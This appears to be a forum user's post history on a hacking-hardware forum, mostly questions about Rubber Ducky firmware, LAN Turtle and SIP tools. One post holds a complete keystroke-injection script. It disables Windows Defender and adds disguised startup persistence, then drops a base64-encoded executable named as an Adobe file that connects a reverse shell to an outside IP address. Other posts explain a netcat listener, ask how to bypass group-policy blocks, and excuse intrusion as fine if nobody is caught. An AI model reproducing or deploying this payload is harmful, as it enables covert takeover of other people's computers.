Roark
-
Posts
13 -
Joined
-
Last visited
-
Days Won
1
Posts posted by Roark
-
-
Does anyone know of a sip client such as sipcmd [http://sipcmd.sourceforge.net/]for windows?
I need to be able to dial the extension for a PA system and play an audio file, from the windows command line. Thanks in advance.
-
Well, I'll edit the script this week and test it out.
-
Do you think I could use [REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f] to edit the registry from powershell even though REGEDIT is disabled?
-
No problem.
-
Powershell is enabled, when I try [powershell Start-Process cmd -Verb runAs], it opens the cmd prompt and says it's disabled by group policy. Can I use powershell to edit the registry and allow cmd prompt?
-
I adapted several other reverse shells into this script, which disables windows defender, runs with startup, and will attempt to reconnect every five minutes if the connection is lost.
However, (in this hypothetical situation) the script can't run on the target pc because, even though it has admin privileges, both cmd prompt and regedit are disabled by group policy.
My question is, how do I enable cmd prompt without editing the registry, or is there no way around it?
REM reverse shell script adapted by Roark REM ***opens admin cmd prompt without uac*** DELAY 1000 CAPSLOCK GUI r DELAY 400 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 REM ***hides cmd prompt window*** ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM ***temporarily disable windows defender*** STRING powershell ENTER DELAY 200 STRING Set-MpPreference -DisableRealtimeMonitoring $true ENTER STRING exit ENTER DELAY 400 REM ***permenently disable windows defender*** STRING erase /Q c:\windows\system32\WinDefend.reg ENTER STRING copy con c:\windows\system32\WinDefend.reg ENTER STRING Windows Registry Editor Version 4.00 ENTER STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] ENTER STRING "DisableAntiSpyware"=dword:00000001 ENTER STRING "DisableRoutinelyTakingAction"=dword:00000001 ENTER CTRL z ENTER STRING REGEDIT /s c:\windows\system32\WinDefend.reg ENTER STRING del c:\windows\system32\WinDefend.reg ENTER REM ***create vbs file to run shell on start*** STRING erase /Q c:\windows\system32\runwinupdate.vbs ENTER STRING copy con c:\windows\system32\runwinupdate.vbs ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.Run chr(34) & "winupdate.bat" & Chr(34), 0 ENTER STRING Set WshShell = Nothing ENTER CTRL z ENTER REM ***add runwinupdates to start registry*** STRING erase /Q c:\windows\system32\dirty.reg ENTER STRING copy con c:\windows\system32\dirty.reg ENTER STRING REGEDIT4 ENTER STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] ENTER STRING "windowsupdates"="c:\windows\system32\runwinupdate.vbs" ENTER CTRL z ENTER STRING REGEDIT /s dirty.reg ENTER STRING del dirty.reg ENTER REM ***connect on startup and try to reconnect every 5 minutes*** STRING erase /Q c:\windows\system32\winupdate.bat ENTER STRING copy con c:\windows\system32\winupdate.bat ENTER STRING @echo off ENTER STRING :LoopStart ENTER STRING @echo off ENTER STRING tasklist /FI "IMAGENAME eq c:\windows\system32\adobe.exe" 2>NUL | find /I /N "c:\windows\system32\adobe.exe" >NUL ENTER STRING if [NOT] "%ERRORLEVEL%"=="0" c:\windows\system32\adobe.exe 104.236.244.103 31330 ENTER STRING timeout /t 300 ENTER STRING GOTO LoopStart ENTER CTRL z REM ***create decode file for shell*** ENTER STRING erase /Q c:\windows\system32\decoder.vbs ENTER STRING copy con c:\windows\system32\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z REM ***create shell*** ENTER STRING erase /Q c:\windows\system32\adobeupdate.txt ENTER STRING copy con c:\windows\system32\adobeupdate.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER REM ***decode and clean up*** STRING cscript c:\windows\system32\decoder.vbs c:\windows\system32\adobeupdate.txt c:\windows\system32\adobe.exe ENTER STRING erase c:\windows\system32\adobeupdate.txt ENTER STRING erase c:\windows\system32\decoder.vbs ENTER REM ***run shell*** STRING c:\windows\system32\winupdate.bat ENTER STRING exit ENTER
-
No, you would create the reverse shell on the target machine and point it to your server. Install netcat on the server and use [nc -l -p yourPortNumber] to receive the reverse shell.
-
For number six, while I seriously doubt that was completely legal, the chances of the neighbour being smart enough to figure out that "your friend" did anything are so small that it doesn't matter. In other words, as long as you don't get caught and no one gets hurt, it's ok. As for everything else, as far as I understand it, monitoring a network that you don't own is illegal. However, I could definitely be wrong about that, and it would be interesting to find the legal loopholes. Good luck in your search for a legal grey area, keep us updated.
-
To anyone else that had this problem:
your first payload should be named inject.bin, and will execute normally, only when no special keys are activated
the second is named inject2.bin and executes with NUMLOCK
the third is named inject3.bin and executes with CAPSLOCK
hope it helps
-
I just flashed my duck with the Mulit Duck firmware (m_duck_v2.hex). I encoded two simple scripts and placed them in the root of the sd card. One is just a delay and is named inject.bin, the other is named inject1.bin, it opens notepad and types "payload two executed." When I turn on num lock and insert the duck, it blinks green, then red, then green, and turns off, without executing the second script. I tried using caps lock, then scroll lock, then I used different scripts, and found out that is is executing the first script, but not the second. I've messed with this for a while, any help would be great.
-
My goal is to drop the turtle on a network, remotely dial the extension for the PA system, and play an audio file.
-
I was wondering if there is a VOIP module for the Lan Turtle, I've done some research and haven't found one, but maybe I just missed it. If there isn't already a module for VOIP, how difficult would it be to create one, or would it be impossible all together? Thanks.
SIP Testing From Windows Command Line
in Applications & Coding
Posted
The network uses a VOIP system, it leases a server from ONSIP.